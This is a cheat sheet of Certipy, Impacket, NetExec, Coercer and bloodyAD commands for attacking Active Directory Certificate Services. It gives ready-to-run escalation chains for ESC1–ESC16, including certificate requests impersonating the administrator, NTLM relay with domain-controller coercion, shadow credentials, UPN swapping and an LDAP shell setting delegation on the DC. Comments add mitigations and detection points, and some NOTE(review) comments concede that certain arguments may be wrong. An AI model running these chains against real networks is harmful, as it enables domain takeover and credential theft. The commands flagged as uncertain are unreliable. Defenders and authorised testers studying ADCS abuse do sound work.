Installation
Certipy
Using pip
# Install Certipy from PyPI inside a dedicated virtualenv so its dependencies stay
# isolated from the system Python. Note the PyPI package name is certipy-ad.
| $ sudo apt update && sudo apt install -y python3 python3-pip
# Create and activate the venv first; the pip line below assumes it is active.
$ python3 -m venv certipy-venv
$ source certipy-venv/bin/activate
$ pip install certipy-ad
Using pipx
| $ pipx install -f "git+https://github.com/ly4k/Certipy.git"
Using uv
| $ uv tool install git+https://github.com/ly4k/Certipy --force
Enumeration
Search for vulnerable certificate templates
| $ certipy find -u username -p password -dc-ip ip -target dc -enabled -vulnerable -stdout
Find PKI Enrollment Services and certificate template names in Active Directory
| $ nxc ldap target -u username -p password -M adcs
Anonymously use RPC endpoints to hunt for ADCS CAs
| $ nxc smb target -M enum_ca
Attacks
ESC1
# ESC1 via a new machine account. Ordinary domain users can typically create computer
# objects (MachineAccountQuota), which is the account used to enrol below.
# NOTE(review): computer accounts are named with a trailing '$'; confirm whether the
# -u value needs it for the Certipy version in use.
| $ impacket-addcomputer domain/username:password -computer-name computer_name -computer-pass computer_password
# Request a certificate from a template that lets the enrollee supply the subject,
# placing the administrator UPN in the SAN. Mitigation: remove the
# enrollee-supplies-subject flag or require manager approval on such templates.
$ certipy req -u computer_name -p computer_password -ca ca -target domain -template template -upn administrator -dc-ip ip
Or
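# ESC1 requested directly as the owned user (no machine account). The template lets
# the enrollee supply the subject, so the administrator UPN goes into the SAN.
# On the CA, the issuance log will show a request whose SAN does not match the
# requester — a useful detection point.
$ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip
# If certipy reports "Minimum RSA Key Length : 4096", the CA rejects the default key
# size; re-run the request with -key-size 4096.
$ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -dc-ip ip -key-size 4096
# Authenticate with the issued certificate. NOTE(review): -u should name the identity
# inside the certificate (administrator) rather than the requesting account — verify
# against the Certipy version in use.
$ certipy auth -pfx administrator.pfx -domain domain -u username -dc-ip ip
# On DCs that enforce strong certificate mapping (see the ESC10 registry check), the
# certificate must also carry the target's SID; supply it with -sid.
$ certipy req -u username -p password -ca ca -target domain -template template -upn administrator -sid <administrator sid> -dc-ip ip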
ESC3
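# ESC3: the first template issues an enrollment-agent certificate; that certificate
# is then used to enrol in the User template on behalf of administrator.
$ certipy req -u username -p password -ca ca -target domain -template template
# -u is required before the username; -pfx is the agent certificate from the step above.
$ certipy req -u username -p password -ca ca -target domain -template User -on-behalf-of administrator -pfx pfx_file
# Mitigation: limit who can enrol in request-agent templates and configure enrollment
# agent restrictions on the CA; agent-certificate issuance is rare and worth alerting on.
$ certipy auth -pfx administrator.pfx -dc-ip ip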
ESC4
# ESC4: the user has write access to the template object, so its configuration is
# overwritten with Certipy's default (ESC1-like) settings. NOTE(review): as I read
# -no-save, the previous configuration is not saved to disk; on an engagement prefer
# saving it so the template can be restored afterwards.
| $ certipy template -u username@domain -p password -template template -write-default-configuration -no-save
# With the template now permissive, request a certificate carrying the administrator UPN.
$ certipy req -u username@domain -p password -ca ca -template template -upn administrator@domain
# Mitigation: audit write ACEs on template objects; template modifications are visible
# in directory-change auditing on the DC.
$ certipy auth -pfx administrator.pfx -dc-ip ip
ESC7
# ESC7: the user holds ManageCA rights, so they grant themselves the officer
# (ManageCertificates) role and enable the SubCA template. Both are CA configuration
# changes — revert them after the engagement. -dns-tcp/-ns point name resolution at ip.
| $ certipy ca -ca ca -add-officer username -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
$ certipy ca -ca ca -enable-template SubCA -u username@domain -p password -dc-ip ip -dns-tcp -ns ip
# The SubCA request is expected to be denied/left pending; note the request ID it returns.
$ certipy req -u username@domain -p password -ca ca -target ip -template SubCA -upn username@domain
# As officer, approve the pending request by ID, then retrieve the issued certificate.
$ certipy ca -ca ca -issue-request request_ID -u username@domain -p password
$ certipy req -u username@domain -p password -ca ca -target ip -retrieve request_ID
# Mitigation: restrict ManageCA/ManageCertificates; officer grants and enabled-template
# changes appear in the CA's audit log.
$ certipy auth -pfx pfx_file -domain domain -u username -dc-ip ip
ESC8
# ESC8: NTLM relay to the web-enrollment endpoint (certsrv) over plain HTTP. The
# --no-*-server flags disable the listeners not needed here; --adcs requests a
# certificate from --template for the relayed identity.
| $ ntlmrelayx.py -t http://domain/certsrv/certfnsh.asp -smb2support --adcs --template template --no-http-server --no-wcf-server --no-raw-server
# Coerce the DC (-t dc_ip) to authenticate back to the relay listener at -l ws_ip.
$ coercer coerce -u username -p password -l ws_ip -t dc_ip --always-continue
# Mitigation: require HTTPS with Extended Protection for Authentication on web
# enrollment (or disable NTLM there); coercion traffic from DCs to workstations is a
# strong detection signal.
$ certipy auth -pfx administrator.pfx
ESC9
# ESC9: shadow credentials on target_username yield its NT hash (:target_hash below).
# This writes msDS-KeyCredentialLink on the target — audit writes to that attribute.
| $ certipy shadow auto -u username@domain -hashes :hash -account target_username
# Set the target's UPN to administrator; record the original value first so it can be restored.
$ certipy account update -u username@domain -hashes :hash -user target_username -upn administrator
# Request a certificate as the target, which now carries the administrator UPN.
$ certipy req -u target_username@domain -hashes :target_hash -ca ca -template template -target dc_ip
# Restore the UPN. NOTE(review): this sets the bare username — use the value recorded above.
$ certipy account update -u username@domain -hashes :hash -user target_username -upn target_username
# Mitigation: templates with the no-security-extension flag plus weak mapping enable
# this; UPN changes on user objects are visible in DC object-change auditing.
$ certipy auth -pfx administrator.pfx -domain domain
ESC10
Enumeration
# Run on a domain controller (PowerShell, despite the '$' prompt). These two registry
# values govern how certificates are mapped to accounts: Kdc\StrongCertificateBindingEnforcement
# for Kerberos and Schannel\CertificateMappingMethods for Schannel. Weak settings
# (enforcement disabled, or UPN-based Schannel mapping) are what ESC10 relies on.
| $ Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc' -Name StrongCertificateBindingEnforcement
$ Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel' -Name CertificateMappingMethods
Exploitation
Case 2
# ESC10 case 2 (weak Schannel mapping): set the victim's UPN to the DC's account name.
# Record the original UPN first so it can be restored.
| $ certipy account -u username@domain -p password -dc-ip ip -target dc -upn dc$@domain -user victim update
# Get a TGT for the victim and use it via Kerberos (-k) for the certificate request.
$ impacket-getTGT domain/victim:password -dc-ip ip
$ export KRB5CCNAME=victim.ccache
$ certipy req -k -dc-ip ip -target dc -ca ca -template User
# Restore the victim's UPN before using the certificate.
$ certipy account -k -dc-ip ip -target dc -upn victim@domain -user victim update
# Authenticate over Schannel (LDAPS) with the certificate; -ldap-shell opens an
# interactive LDAP shell. The '#' lines below are that shell's prompt/output, not comments.
# Mitigation: set CertificateMappingMethods to the default and enable strong binding
# enforcement; watch for UPN writes that reference machine accounts.
$ certipy auth -pfx dc.pfx -dc-ip ip -ldap-shell
# whoami
u:DOMAIN\DC$
# set_rbcd DC$ Machine_Account$
ESC13
# ESC13: the template carries an issuance policy whose OID is linked to a group
# (OID-to-group link), so authenticating with the certificate adds that group to the
# token. No SAN override is needed here.
| $ certipy req -u username -p password -ca ca -target domain -template template -dc-ip ip
# Mitigation: review issuance-policy OIDs with group links and who can enrol in the
# linked templates.
$ certipy auth -pfx file.pfx -dc-ip ip
ESC14
# ESC14: write an explicit, weak (RFC822/e-mail) mapping into the target's
# altSecurityIdentities and set the target's mail attribute to match.
# Writes to altSecurityIdentities should be audited and alerted on.
| $ bloodyAD --host dc -d domain -u username -p password set object target altSecurityIdentities -v 'X509:<RFC822>target@domain'
$ bloodyAD --host dc -d domain -u owned_user -p password set object target mail -v target@domain
# Point the enrolling account's UPN at the target; record the original UPN first.
$ certipy account update -u owned_user@domain -p password -user username -upn target
# Request a certificate as username; the resulting certificate matches the mapping above.
$ certipy req -u username -p password -ca ca -template template -dc-ip ip
# Restore the UPN before authenticating.
$ certipy account update -u owned_user -p password -user username -upn username@domain -dc-ip ip
# Mitigation: prefer strong mappings (Issuer+Serial, SKI, SHA1-PublicKey) and restrict
# write access to altSecurityIdentities and mail.
$ certipy auth -pfx pfx -dc-ip ip -user target -domain domain
ESC15
Scenario A
# ESC15 scenario A: on an unpatched CA, -application-policies injects a Client
# Authentication policy into a request against a schema-version-1 template, combined
# with an administrator UPN and SID. Mitigation: apply the vendor fix and review
# version-1 templates that allow enrollee-supplied subjects.
| $ certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template template -upn administrator@domain -sid <administrator sid> -application-policies 'Client Authentication'
$ certipy auth -pfx administrator.pfx -dc-ip ip -ldap-shell
Scenario B
# ESC15 scenario B: the WebServer template is abused to obtain a certificate carrying
# the Certificate Request Agent policy, then that certificate is used ESC3-style to
# enrol on behalf of administrator.
| $ certipy req -u username@domain -p password -dc-ip ip -ca ca -template WebServer -application-policies 'Certificate Request Agent'
$ certipy req -u username@domain -p password -dc-ip ip -ca ca -template User -pfx user.pfx -on-behalf-of 'DOMAIN\Administrator'
# Mitigation as for scenario A, plus enrollment agent restrictions on the CA.
$ certipy auth -pfx administrator.pfx -dc-ip ip
ESC16
Use an owned user that has GenericAll or GenericWrite over the account being modified
# ESC16: the CA omits the SID security extension, so account mapping falls back to the
# UPN. Set the controlled account's UPN to administrator (record the original first).
| $ certipy account -u owned_user@domain -p password -dc-ip ip -upn administrator -user username update
# Request a certificate as that account; it is issued for the administrator UPN.
$ certipy req -u username@domain -p password -dc-ip ip -target dc -ca ca -template User -upn administrator@domain -sid <administrator sid>
# Restore the UPN before authenticating.
$ certipy account -u owned_user@domain -p password -dc-ip ip -upn username -user username update
# Mitigation: re-enable the SID extension on the CA and enforce strong certificate
# mapping on DCs; UPN changes on user objects show up in directory-change auditing.
$ certipy auth -pfx administrator.pfx -dc-ip ip -domain domain